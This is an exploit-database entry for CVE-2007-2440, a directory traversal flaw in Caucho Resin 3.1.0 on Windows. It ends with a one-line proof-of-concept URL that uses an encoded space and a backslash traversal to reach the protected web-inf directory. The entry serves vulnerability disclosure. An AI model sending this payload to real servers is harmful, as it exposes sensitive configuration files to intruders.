Caucho Resin 3.1 - '/web-inf' Traversal Arbitrary File Access

Author: Derek Abdine
type: remote
platform: windows
port: 
date_added: 2007-05-15 
date_updated: 2013-12-05 
verified: 1 
codes: CVE-2007-2440;OSVDB-36058 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/23985/info

Caucho Resin is prone to multiple information-disclosure vulnerabilities because it fails to adequately sanitize user-supplied data.

Attackers can exploit these issues to access potentially sensitive data that may aid in further attacks.

Resin 3.1.0 is vulnerable; other versions may also be affected.

NOTE: According to the application's 3.1.1 change log, these issues affect the server only when installed on Microsoft Windows.

http://www.example.com:8080/%20..\web-inf